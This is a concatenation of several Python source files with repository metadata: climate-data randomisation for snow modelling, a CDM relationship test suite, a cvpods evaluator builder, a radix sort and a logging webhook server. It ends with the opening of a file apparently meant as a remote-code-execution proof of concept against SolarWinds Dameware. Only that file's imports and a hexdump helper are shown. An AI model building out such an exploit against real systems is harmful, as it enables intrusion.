sceNum = ScenarioNumbers
firstYear = FirstYear
lastYear = LastYear
simLen = lastYear - firstYear + 1
from random import shuffle
#a = []
#for x in range(simLen):
#randomInd = [z for z in range(sceNum)]
#shuffle(randomInd)
#a.append(randomInd)
a = []
for i in range(simLen):
randomInd = [z for z in range(sceNum)]
#x = [[i] for i in range(10)]
for x in range(int(round(Xfactor1))):
shuffle(randomInd)
a.append(randomInd)
RCP = RCPNames
columnsDfpcp = ['sc_' + RCP + str(k) for k in range(1, sceNum+1,1)]
c = [[19810101 for p in range(sceNum)]]
#df1 = 'df' + str(outDFNumber)
df1pcp = pd.DataFrame(c, columns =columnsDfpcp)
#df1.to_csv('SAeidVaghefimodified1111222.csv', index = False)
c.clear()
i = 0
p = 1
for m in range(firstYear, lastYear + 1, 1):
if is_leap(m):
for j in range(((m - firstYear)*365+p) , ((m - firstYear)*365+367+p-1), 1):
c.append(dfpcp[dfpcpCol[a[i]]].iloc[j].values)
i += 1 # counter i; equal to simulation length (simLen)
p += 1
else:
for j in range(((m - firstYear)*365+p), ((m - firstYear)*365+366+p-1), 1):
c.append(dfpcp[dfpcpCol[a[i]]].iloc[j].values)
i += 1
#print(m) # this line show the progress of the work by typing the years of simulation
dfnewpcp = 'df' + str(m)
dfnewpcp = pd.DataFrame(c, columns =columnsDfpcp)
c.clear()
df1pcp = df1pcp.append(dfnewpcp, ignore_index=True)
return df1pcp
## S1.2. Function that pruduces new climate (temperature) realization
def random_tmp(dftmp, FirstYear, LastYear, ScenarioNumbers, RCPNames, Xfactor1):
#dfCol = df.columns
#sceNum = len(dfCol) // 2
sceNum = ScenarioNumbers
firstYear = FirstYear
lastYear = LastYear
simLen = lastYear - firstYear + 1
dftmpColMax = dftmp.columns[[i for i in range(0, sceNum*2, 2)]]
dftmpColMin = dftmp.columns[[i for i in range(1, sceNum*2, 2)]]
## yek list be toole 119 ke dakhelesh list haye 68 ta ee darim be soorate random
from random import shuffle
#a = []
#for i in range(simLen):
#randomInd = [j for j in range(sceNum)]
#x = [[i] for i in range(10)]
#shuffle(randomInd)
#a.append(randomInd)
a = []
for i in range(simLen):
randomInd = [j for j in range(sceNum)]
#x = [[i] for i in range(10)]
for x in range(int(round(Xfactor1))):
shuffle(randomInd)
a.append(randomInd)
#print('end!')
cT = []
RCP = RCPNames
columnsDfOdd = ['sc_' + RCP + str(k) for k in range(1, sceNum+1,1)]
columnsDfEven = [""] * sceNum
columnsDftmp = []
#colOdd = ['Scr_' + str(i) for i in range(1, sceNum+1, 1)]
#colEven = ['' for i in range(1, sceNum+1,1)]
for i in range (sceNum):
columnsDftmp.append(columnsDfOdd[i])
columnsDftmp.append(columnsDfEven[i])
#### OR:
#columnsDf = ["Sr", ""] * sceNum
df1tmp = pd.DataFrame(cT, columns =columnsDftmp)
#df1.to_csv("rrrrrrrrmodified1111222.csv", index = False)
cMax = [[19810101 for p in range(sceNum)]]
cMin = [["" for p in range(sceNum)]]
i = 0
p = 1
for m in range(firstYear, lastYear + 1, 1):
if is_leap(m):
for j in range(((m - firstYear)*365+p) , ((m - firstYear)*365+367+p-1), 1):
cMax.append(dftmp[dftmpColMax[a[i]]].iloc[j].values)
cMin.append(dftmp[dftmpColMin[a[i]]].iloc[j].values)
i += 1
else:
for j in range(((m - firstYear)*365+p), ((m - firstYear)*365+366+p-1), 1):
cMax.append(dftmp[dftmpColMax[a[i]]].iloc[j].values)
cMin.append(dftmp[dftmpColMin[a[i]]].iloc[j].values)
i += 1
c = []
for y in range(0, len(cMax), 1): # the length of simulation years
for z in range(sceNum): # range(4)
c.append(cMax[y][z])
c.append(cMin[y][z])
cMax.clear()
cMin.clear()
cMain = []
cMain = list(chunks(c, sceNum * 2))
#print(m) # this line show the progress of the work by typing the years of simulation
### Should be checked
dfnewtmp = 'dftmp' + str(m)
#columnsDf = ["Sr", ""]*sceNum
#columnsDf = [['sc_' + str(k), ""] for k in range(1, sceNum+1,1)]
dfnewtmp = pd.DataFrame(cMain, columns =columnsDftmp)
c.clear()
df1tmp = df1tmp.append(dfnewtmp, ignore_index=True)
return df1tmp
## S1.3. Function that calls the random_pcp and random_tmp for all stations of a Ski resort
def randomness_pcp_tmp(fnames, Xfactor1):
for f in fnames:
if 'p.csv' in f:
print('Writing pcp files started!')
#df = pd.read_csv('47-0625000_8-6666667p.csv')
dfpcp = pd.read_csv(f)
filt1 = dfpcp.columns.str.contains('RCP26|_26_') #12
filt2 = dfpcp.columns.str.contains('RCP45|_45_') #25
filt3 = dfpcp.columns.str.contains('RCP85|_85_') #31
dfpcpRCP26 = dfpcp.loc[:, filt1]
dfpcpRCP45 = dfpcp.loc[:, filt2]
dfpcpRCP85 = dfpcp.loc[:, filt3]
dfpcpRCP26_n = random_pcp(dfpcpRCP26, 1981, 2099, 12, '26_', Xfactor1)
dfpcpRCP45_n = random_pcp(dfpcpRCP45, 1981, 2099, 25, '45_', Xfactor1)
dfpcpRCP85_n = random_pcp(dfpcpRCP85, 1981, 2099, 31, '85_', Xfactor1)
result = pd.concat([dfpcpRCP26_n, dfpcpRCP45_n, dfpcpRCP85_n], axis=1, sort=False)
#result.to_csv('47-0625000_8-6666667p_n1.csv', index = False)
#newName = 'n_'+ f
newName = f
#filepath = os.path.join(os.getcwd(), newName)
root = os.getcwd()
'''This part makes a new dir for outouts''' ## should be cooment out later
#if os.path.isdir(os.path.join(root, 'Outputs_randomness')):
#pass
#else: os.mkdir(os.path.join(root, 'Outputs_randomness'))
#outfolder = os.path.join(os.getcwd(), 'Outputs_randomness')
outfolder =os.path.join(os.getcwd()) # we want the results to be over written
filepath = os.path.join(outfolder, newName)
result.to_csv(filepath, index = False)
print('End of writing pcp files!')
#print("--- %s seconds ---" % (time.time() - start_time))
elif 't.csv' in f:
print('Writing tmp files started!')
dftmp = pd.read_csv(f)
dftmpCol = list(dftmp.columns)
filt1_max = [dftmpCol.index(s) for s in dftmpCol if ("_26_") in s or ("RCP26") in s]
filt2_max = [dftmpCol.index(s) for s in dftmpCol if ("_45_") in s or ("RCP45") in s]
filt3_max = [dftmpCol.index(s) for s in dftmpCol if ("_85_") in s or ("RCP85") in s]
aOnefilt1= [1]*len(filt1_max)
aOnefilt2= [1]*len(filt2_max)
aOnefilt3= [1]*len(filt3_max)
filt1_min = list(map(add, filt1_max, aOnefilt1)) #
filt2_min = list(map(add, filt2_max, aOnefilt2))
filt3_min = list(map(add, filt3_max, aOnefilt3))
filt1Tot = []
for i in range(len(filt1_max)):
filt1Tot.append(filt1_max[i])
filt1Tot.append(filt1_min[i])
filt2Tot = []
for j in range(len(filt2_max)):
filt2Tot.append(filt2_max[j])
filt2Tot.append(filt2_min[j])
filt3Tot = []
for k in range(len(filt3_max)):
filt3Tot.append(filt3_max[k])
filt3Tot.append(filt3_min[k])
dftmpRCP26 = dftmp[dftmp.columns[filt1Tot]]
dftmpRCP45 = dftmp[dftmp.columns[filt2Tot]]
dftmpRCP85 = dftmp[dftmp.columns[filt3Tot]]
dftmpRCP26_n = random_tmp (dftmpRCP26, 1981, 2099, 12, '26_', Xfactor1)
dftmpRCP45_n = random_tmp (dftmpRCP45, 1981, 2099, 25, '45_', Xfactor1)
dftmpRCP85_n = random_tmp (dftmpRCP85, 1981, 2099, 31, '85_', Xfactor1)
result = pd.concat([dftmpRCP26_n, dftmpRCP45_n, dftmpRCP85_n], axis=1, sort=False)
#ewName = 'n'+f
#ilepath = os.path.join(os.environ.get('HOME'), newName)
#esult.to_csv(filepath, index = False)
#newName = 'n_'+ f
newName = f
#filepath = os.path.join(os.getcwd(), newName)
#outfolder =os.path.join(os.getcwd(), 'Outputs_randomness')
outfolder =os.path.join(os.getcwd()) # we want the results to be over written
filepath = os.path.join(outfolder, newName)
result.to_csv(filepath, index = False)
print('End of writing tmp files')
else :
pass
## Step 2: Function for initiating the main dictionary of climate stations
def create_dic(a):
'''Function: creating a dictionary for each climate station'''
a = {}
keys = ['fM', 'iPot', 'rSnow', 'dSnow', 'cPrec', 'dP', 'elev', 'lat', 'long', 'fileName']
a = {key: None for key in keys}
return a
def initialize_input_dict (mainFolderSki):
''' This function returns a dictionary , and addresses of 4 folders'''
'''Step 1'''
rootFolder = mainFolderSki
inputFolder = os.path.join(rootFolder,'input')
ablationFolder = os.path.join(inputFolder, 'Ablation')
accumulationFolder = os.path.join(inputFolder, 'Accumulation')
climate_ref_Folder = os.path.join(inputFolder, 'Climate_ref')
climate_Ref_Folder_org = os.path.join(inputFolder, 'Climate_ref_no_randomness_0')
climate_ref_Folder_rand_1 = os.path.join(inputFolder, 'Climate_ref_randomness_1')
climate_ref_Folder_rand_2 = os.path.join(inputFolder, 'Climate_ref_randomness_2')
'''Step 2: Reading all files names inside the Ablation, Accumulation, and Climate folders'''
ablationFiles = []
for filename in os.walk(ablationFolder):
ablationFiles = filename[2]
accumulationFiles = list()
for filename in os.walk(accumulationFolder):
accumulationFiles = filename[2]
climate_ref_Files = list()
for filename in os.walk(climate_ref_Folder):
climate_ref_Files = filename[2]
'''Step 3: Reading files inside ablation folder '''
os.chdir(ablationFolder)
with open(ablationFiles[0], 'r') as file:
FM1 = file.read()
with open(ablationFiles[1], 'r') as file:
Ipot1 = file.read()
with open(ablationFiles[2], 'r') as file:
Rsnow1 = file.read()
'''Step 4: Reading the lines of files inside ablation folder'''
FM1 = FM1.replace('\n', '\t')
FM1 = FM1.split('\t')
Ipot1 = Ipot1.replace('\n', '\t').split('\t')
Rsnow1 = Rsnow1.replace('\n', '\t').split('\t')
'''Step 5: Reading the lines of files inside accumulation folder'''
os.chdir(accumulationFolder)
with open(accumulationFiles[0], 'r') as file:
cPrec = file.read()
with open(accumulationFiles[1], 'r') as file:
dSnow1 = file.read()
cPrec = cPrec.replace('\n', '\t')
cPrec = cPrec.split('\t')
dSnow1 = dSnow1.replace('\n', '\t').split('\t')
'''Step 6: Reading the lines of files inside climate folder'''
os.chdir(climate_ref_Folder)
with open('pcp.txt', 'r') as file:
pcpData = file.read()
with open('tmp.txt', 'r') as file:
tmpData = file.read()
pcpData = pcpData.split('\n')
for i in range(len(pcpData)):
pcpData[i] = pcpData[i].split(',')
'''Step 7: Initialazing the input dictionary of climate stations which holds the information of accumulation
and ablation, and etc of the stations'''
nameStn = []
for file in climate_ref_Files:
if 'p.csv' in file:
#nameStn.append('n_' + file[-25: -5])
nameStn.append(file[-25: -5])
stnDicts = []
for i in range(len(nameStn)):
stnDicts.append(create_dic(nameStn[i]))
'''Step 8: Assigning the file names to the dictionary'''
for i in range (len(nameStn)):
stnDicts[i]['fileName'] = nameStn[i]
'''Step 9: Assigning the accumulation and ablation values'''
for stnDict in stnDicts:
for i, element in enumerate(FM1):
if element == stnDict['fileName'][:]:
#if element == stnDict['fileName'][2:]:
stnDict['fM'] = FM1[i+1]
for i, element in enumerate(Ipot1):
if element == stnDict['fileName'][:]:
#if element == stnDict['fileName'][2:]:
stnDict['iPot'] = Ipot1[i+1]
for i, element in enumerate(Rsnow1):
if element == stnDict['fileName'][:]:
#if element == stnDict['fileName'][2:]:
stnDict['rSnow'] = Rsnow1[i+1]
for i, element in enumerate(dSnow1):
if element == stnDict['fileName'][:]:
#if element == stnDict['fileName'][2:]:
stnDict['dSnow'] = dSnow1[i+1]
for i, element in enumerate(cPrec):
stnDict['cPrec'] = cPrec[1]
stnDict['dP'] = cPrec[3]
'''Step 10: Assigning the elevation, Lat and long to the dictionaries'''
for i in range(len(stnDicts)):
for j in range(1, len(pcpData)):
#if pcpData[j][1][2:-1] == stnDicts[i]['fileName'][2:]:
if pcpData[j][1][:-1] == stnDicts[i]['fileName'][:]:
stnDicts[i]['lat']= pcpData[j][2]
stnDicts[i]['long']= pcpData[j][3]
stnDicts[i]['elev']= pcpData[j][4]
return stnDicts, inputFolder, ablationFolder, accumulationFolder, climate_ref_Folder, climate_Ref_Folder_org, \
climate_ref_Folder_rand_1, climate_ref_Folder_rand_2
#### S3.1 *Initializiing the main dictionary for a case study*
caseStudyStns = {}
inputFolder = ''
ablationFolder = ''
accumulationFolder = ''
climateFolder = ''
climateFolder_org = ''
climateFolder1 = ''
climateFolder2 = ''
#root = 'C:/Users/ashrafse/SA_2/snowModelUZH/case2_Atzmaening'
#root = 'C:/Users/ashrafse/SA_2/snowModelUZH/case6_davos_elevations'
#root = r'C:\Saeid\Prj100\SA_2\snowModelUZH\case6_davos_elevations_b2584'
root = r'C:\Saeid\Prj100\SA_2\snowModelUZH\case3_hoch-ybrig_v3_2'
## calling the function with multiple return values
caseStudyStns, inputFolder, ablationFolder, accumulationFolder, climateFolder, climateFolder_org, \
climateFolder1, climateFolder2 = initialize_input_dict(root)
os.chdir(climateFolder)
fnames = os.listdir()
randomness_pcp_tmp(fnames, 4)
| 34.6 | 115 | 0.58426 |
632e9146655ceead20c4319ea2840b8bd286e48d | 66 | py | Python | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 206 | 2021-09-23T08:55:29.000Z | 2022-03-26T13:15:41.000Z | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 24 | 2021-09-24T05:54:39.000Z | 2022-03-25T01:44:49.000Z | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 34 | 2021-09-26T02:17:29.000Z | 2022-03-28T07:01:54.000Z | from .cpm1 import CPM1
from .cpm2 import CPM2
from .eva import EVA | 22 | 22 | 0.787879 |
feb5f5d3c1df79f2c4a7eeb584993486f2c849fa | 10,891 | py | Python | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.objectmodel import CdmEntityDefinition, CdmCorpusDefinition, CdmE2ERelationship, CdmCollection
from tests.cdm.projection.attribute_context_util import AttributeContextUtil
from tests.common import async_test, TestHelper
from tests.utilities.projection_test_utils import ProjectionTestUtils
class CalculateRelationshipTest(unittest.TestCase):
"""Test to validate calculate_entity_graph_async function"""
# The path between TestDataPath and TestName.
tests_subpath = os.path.join('Cdm', 'Relationship', 'TestCalculateRelationship')
@async_test
async def test_simple_with_id(self):
"""Non projection scenario with the referenced entity having a primary key"""
test_name = 'test_simple_with_id'
entity_name = 'Sales'
await self._test_run(test_name, entity_name, False)
@async_test
async def test_without_id_proj(self):
"""Projection scenario with the referenced entity not having any primary key"""
test_name = 'test_without_id_proj'
entity_name = 'Sales'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_diff_ref_loation(self):
"""Projection scenario with the referenced entity in a different folder"""
test_name = 'test_diff_ref_location'
entity_name = 'Sales'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_composite_proj(self):
"""Projection with composite keys"""
test_name = 'test_composite_proj'
entity_name = 'Sales'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_nested_composite_proj(self):
"""Projection with nested composite keys"""
test_name = 'test_nested_composite_proj'
entity_name = 'Sales'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_polymorphic_without_proj(self):
"""Non projection scenario with selectsSubAttribute set to one"""
test_name = 'test_polymorphic_without_proj'
entity_name = 'CustomPerson'
await self._test_run(test_name, entity_name, False)
@async_test
async def test_polymorphic_proj(self):
"""Projection with IsPolymorphicSource property set to true"""
test_name = 'test_polymorphic_proj'
entity_name = 'Person'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_composite_key_polymorphic_relationship(self):
"""Test a composite key relationship with a polymorphic entity."""
test_name = 'test_composite_key_polymorphic_relationship'
entity_name = 'Person'
await self._test_run(test_name, entity_name, True)
@async_test
async def test_composite_key_polymorphic_relationship(self):
"""Test a composite key relationship with multiple entity attribute but not polymorphic."""
test_name = 'test_composite_key_non_polymorphic_relationship'
entity_name = 'Person'
await self._test_run(test_name, entity_name, True)
async def _test_run(self, test_name: str, entity_name: str, is_entity_set: bool) -> None:
"""Common test code for these test cases"""
corpus = TestHelper.get_local_corpus(self.tests_subpath, test_name)
expected_output_folder = TestHelper.get_expected_output_folder_path(self.tests_subpath, test_name)
actual_output_folder = TestHelper.get_actual_output_folder_path(self.tests_subpath, test_name)
if not os.path.exists(actual_output_folder):
os.makedirs(actual_output_folder)
manifest = await corpus.fetch_object_async('local:/default.manifest.cdm.json')
self.assertIsNotNone(manifest)
entity = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_name, entity_name), manifest)
self.assertIsNotNone(entity)
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, ['referenceOnly'])
self._assert_entity_shape_in_resolved_entity(resolved_entity, is_entity_set)
actual_attr_ctx = self._get_attribute_context_string(resolved_entity, entity_name, actual_output_folder)
with open(os.path.join(expected_output_folder, 'AttrCtx_{}.txt'.format(entity_name))) as expected_file:
expected_attr_ctx = expected_file.read()
self.assertEqual(expected_attr_ctx, actual_attr_ctx)
await corpus.calculate_entity_graph_async(manifest)
await manifest.populate_manifest_relationships_async()
actual_relationships_string = self._list_relationships(corpus, entity, actual_output_folder, entity_name)
relationships_filename = 'REL_{}.txt'.format(entity_name)
with open(os.path.join(actual_output_folder, relationships_filename), 'w') as actual_file:
actual_file.write(actual_relationships_string)
with open(os.path.join(expected_output_folder, relationships_filename)) as expected_file:
expected_relationships_string = expected_file.read()
self.assertEqual(expected_relationships_string, actual_relationships_string)
output_folder = corpus.storage.fetch_root_folder('output')
output_folder.documents.append(manifest)
manifest_file_name = 'saved.manifest.cdm.json'
await manifest.save_as_async(manifest_file_name, True)
actual_manifest_path = os.path.join(actual_output_folder, manifest_file_name)
if not os.path.exists(actual_manifest_path):
self.fail('Unable to save manifest with relationship')
else:
saved_manifest = await corpus.fetch_object_async('output:/{}'.format(manifest_file_name))
actual_saved_manifest_rel = self._get_relationship_strings(saved_manifest.relationships)
manifest_relationships_filename = 'MANIFEST_REL_{}.txt'.format(entity_name)
with open(os.path.join(actual_output_folder, manifest_relationships_filename), 'w') as actual_file:
actual_file.write(actual_saved_manifest_rel)
with open(os.path.join(expected_output_folder, manifest_relationships_filename)) as expected_file:
expected_saved_manifest_rel = expected_file.read()
self.assertEqual(expected_saved_manifest_rel, actual_saved_manifest_rel)
def _assert_entity_shape_in_resolved_entity(self, resolved_entity: 'CdmEntityDefinition', is_entity_set: bool) -> None:
for att in resolved_entity.attributes:
for trait in att.applied_traits:
if trait.named_reference == 'is.linkedEntity.identifier' and len(trait.arguments) > 0:
const_ent = trait.arguments[0].value.fetch_object_definition()
if const_ent and const_ent.entity_shape:
entity_shape = const_ent.entity_shape.named_reference
self.assertEqual('entitySet', entity_shape) if is_entity_set else self.assertEqual('entityGroupSet', entity_shape)
return
self.fail('Unable to find entity shape from resolved model.')
def _get_relationship_strings(self, relationships: 'CdmCollection[CdmE2ERelationship]') -> str:
"""Get a string version of the relationship collection"""
bldr = ''
for rel in relationships:
bldr += '{}|{}|{}|{}|{}'.format(rel.relationship_name if rel.relationship_name else '', rel.to_entity,
rel.to_entity_attribute, rel.from_entity, rel.from_entity_attribute)
bldr += '\n'
return bldr
def _get_relationship_string(self, rel: 'CdmE2ERelationship') -> str:
"""Get a string version of the relationship collection"""
name_and_pipe = ''
if rel.relationship_name:
name_and_pipe = rel.relationship_name + '|'
return '{}{}|{}|{}|{}\n'.format(name_and_pipe, rel.to_entity,
rel.to_entity_attribute, rel.from_entity, rel.from_entity_attribute)
def _list_relationships(self, corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', actual_output_folder: str, entity_name: str) -> str:
"""List the incoming and outgoing relationships"""
bldr = ''
rel_cache = set()
bldr += 'Incoming Relationships For: {}:\n'.format(entity.entity_name)
# Loop through all the relationships where other entities point to this entity.
for relationship in corpus.fetch_incoming_relationships(entity):
cache_key = self._get_relationship_string(relationship)
if cache_key not in rel_cache:
bldr += self._print_relationship(relationship)
rel_cache.add(cache_key)
print('Outgoing Relationships For: {}:'.format(entity.entity_name))
# Now loop through all the relationships where this entity points to other entities.
for relationship in corpus.fetch_outgoing_relationships(entity):
cache_key = self._get_relationship_string(relationship)
if cache_key not in rel_cache:
bldr += self._print_relationship(relationship) + '\n'
rel_cache.add(cache_key)
return bldr
def _print_relationship(self, relationship: 'CdmE2ERelationship') -> str:
"""Print the relationship"""
bldr = ''
if relationship.relationship_name:
bldr += ' Name: {}\n'.format(relationship.relationship_name)
bldr += ' FromEntity: {}\n'.format(relationship.from_entity)
bldr += ' FromEntityAttribute: {}\n'.format(relationship.from_entity_attribute)
bldr += ' ToEntity: {}\n'.format(relationship.to_entity)
bldr += ' ToEntityAttribute: {}\n'.format(relationship.to_entity_attribute)
if relationship.exhibits_traits:
bldr += ' ExhibitsTraits:\n'
order_applied_traits = sorted(relationship.exhibits_traits, key=lambda x: x.named_reference)
for trait in order_applied_traits:
bldr += ' {}\n'.format(trait.named_reference)
for args in trait.arguments:
attr_ctx_util = AttributeContextUtil()
bldr += ' {}\n'.format(attr_ctx_util.get_argument_values_as_strings(args))
bldr += '\n'
print(bldr)
return bldr
def _get_attribute_context_string(self, resolved_entity: 'CdmEntityDefinition', entity_name: str, actual_output_folder: str) -> str:
"""Check the attribute context for these test scenarios"""
return (AttributeContextUtil()).get_attribute_context_strings(resolved_entity)
| 48.620536 | 148 | 0.696263 |
2820fdc8a72435d8f3016077ab2199900e4b371e | 3,534 | py | Python | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2019-2021 Megvii Inc. All rights reserved.
import os
import torch
from cvpods.utils import comm
from .evaluator import DatasetEvaluators
from .registry import EVALUATOR
def build_evaluator(cfg, dataset_name, dataset, output_folder=None, dump=False):
"""
Create evaluator(s) for a given dataset.
This uses the special metadata "evaluator_type" associated with each builtin dataset.
For your own dataset, you can simply create an evaluator manually in your
script and do not have to worry about the hacky if-else logic here.
"""
if output_folder is None:
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
evaluator_list = []
meta = dataset.meta
evaluator_type = meta.evaluator_type
if evaluator_type in ["sem_seg", "coco_panoptic_seg"]:
evaluator_list.append(
EVALUATOR.get("SemSegEvaluator")(
dataset_name,
dataset,
distributed=True,
num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
output_dir=output_folder,
dump=dump,
)
)
if evaluator_type in ["coco", "coco_panoptic_seg", "citypersons"]:
evaluator_list.append(
EVALUATOR.get("COCOEvaluator")(dataset_name, meta, cfg, True, output_folder, dump)
)
if evaluator_type == "coco_panoptic_seg":
evaluator_list.append(
EVALUATOR.get("COCOPanopticEvaluator")(dataset_name, meta, output_folder, dump))
elif evaluator_type == "cityscapes":
assert (
torch.cuda.device_count() >= comm.get_rank()
), "CityscapesEvaluator currently do not work with multiple machines."
return EVALUATOR.get("CityscapesEvaluator")(dataset_name, meta, dump)
elif evaluator_type == "pascal_voc":
return EVALUATOR.get("PascalVOCDetectionEvaluator")(dataset_name, meta, dump)
elif evaluator_type == "lvis":
return EVALUATOR.get("LVISEvaluator")(dataset_name, meta, cfg, True, output_folder, dump)
elif evaluator_type == "citypersons":
evaluator_list.append(
EVALUATOR.get("CityPersonsEvaluator")(
dataset_name, meta, cfg, True, output_folder, dump)
)
if evaluator_type == "crowdhuman":
return EVALUATOR.get("CrowdHumanEvaluator")(
dataset_name, meta, cfg, True, output_folder, dump
)
elif evaluator_type == "widerface":
return EVALUATOR.get("WiderFaceEvaluator")(
dataset_name, meta, cfg, True, output_folder, dump)
if evaluator_type == "classification":
return EVALUATOR.get("ClassificationEvaluator")(
dataset_name, meta, cfg, True, output_folder, dump)
if evaluator_type == "longtailclassification":
return EVALUATOR.get("LongTailClassificationEvaluator")(
dataset_name, meta, cfg, True, output_folder, dump
)
if hasattr(cfg, "EVALUATORS"):
for evaluator in cfg.EVALUATORS:
evaluator_list.append(evaluator(dataset_name, meta, True, output_folder, dump=True))
if len(evaluator_list) == 0:
raise NotImplementedError(
"no Evaluator for the dataset {} with the type {}".format(
dataset_name, evaluator_type
)
)
elif len(evaluator_list) == 1:
return evaluator_list[0]
return DatasetEvaluators(evaluator_list)
| 38.413043 | 97 | 0.65648 |
9ee73932d2e25761ba1385f35540410cf312bc41 | 929 | py | Python | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | import random
def radix(totalNumbers, numbers):
maxLen = False
tmp = -1
location = 1
while not maxLen:
maxLen = True
baskets = [list() for _ in range(totalNumbers)]
for i in numbers:
tmp = int(i / location)
baskets[int(tmp % totalNumbers)].append(i)
if maxLen and tmp > 0:
maxLen = False
a = 0
for b in range(totalNumbers):
basket = baskets[b]
for i in basket:
numbers[a] = i
a += 1
location *= totalNumbers
print("baskets", baskets)
def menu(totalNumbers, numbers, option):
if option == 1:
for x in range(totalNumbers):
value = int(input("enter data"))
numbers.append(value)
if option == 2:
for x in range(totalNumbers):
a = random.randint(0, 10000)
numbers.append(a)
| 23.820513 | 55 | 0.514532 |
00442b80500b8be20dded0c0dbc3f3321d7eacbe | 1,508 | py | Python | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import logging
class WebHookServer(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length) # <--- Gets the data itself
json_data = json.dumps(json.loads(post_data.decode('utf-8')),indent=4) # <---- pretty formats the data
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
str(self.path), str(self.headers), json_data)
self._set_response()
self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=WebHookServer, port=4222):
logging.basicConfig(level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info('Starting httpd...Listening on %s for all interfaces',port)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
logging.info('Stopping httpd...\n')
if __name__ == '__main__':
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]))
else:
run()
| 32.782609 | 110 | 0.664456 |
ab75ed5e056631a86413bf4cfdd92060463f816c | 11,776 | py | Python | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 1,007 | 2018-09-17T16:13:26.000Z | 2022-03-29T00:19:42.000Z | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | demirelcan/poc | 201ea88410c7a9e684f6cb66118c46b3ee02bd5b | [
"BSD-3-Clause"
] | 5 | 2018-11-11T09:54:27.000Z | 2020-06-24T22:59:49.000Z | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | demirelcan/poc | 201ea88410c7a9e684f6cb66118c46b3ee02bd5b | [
"BSD-3-Clause"
] | 325 | 2018-09-18T04:44:53.000Z | 2022-03-30T18:08:13.000Z | import sys, socket, os,string, binascii, argparse
from struct import *
from Crypto.Cipher import AES
from Crypto.Hash import HMAC,SHA512
from Crypto.Protocol import KDF
from Crypto.Signature import PKCS1_v1_5
from Crypto.PublicKey import RSA
# Got it from the Internet
def hexdump(src, length=16):
DISPLAY = string.digits + string.letters + string.punctuation
FILTER = ''.join(((x if x in DISPLAY else '.') for x in map(chr, range(256))))
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
if len(hex) > 24:
hex = "%s %s" % (hex[:24], hex[24:])
printable = ''.join(["%s" % FILTER[ord(x)] for x in chars])
lines.append("%08x: %-*s %s\n" % (c, length*3, hex, printable))
return ''.join(lines)
